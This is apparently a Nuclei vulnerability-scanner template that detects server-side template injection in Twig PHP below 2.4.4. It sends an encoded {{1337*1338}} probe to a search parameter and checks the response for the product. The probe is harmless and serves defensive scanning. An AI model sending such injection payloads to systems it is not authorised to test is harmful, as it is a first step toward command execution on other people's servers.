id: twig-php-ssti

info:
  name: Twig PHP <2.4.4 template engine - SSTI
  author: madrobot
  severity: high
  description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
  metadata:
    max-request: 1
  tags: php,ssti,twig

http:
  - method: GET
    path:
      - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"

    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "1788906"

      - type: status
        status:
          - 404
        negative: true

# digest: 4b0a00483046022100d750e9b1cb05a14438279f656ec2022b54696af1d29b00a2f61f1cc7c71dfaeb022100a80fb09677f4f6d560a1223450dd1307e7adac07ff00fd8c43ab3f3edb5406cd:922c64590222798bb761d5b6d8e72950
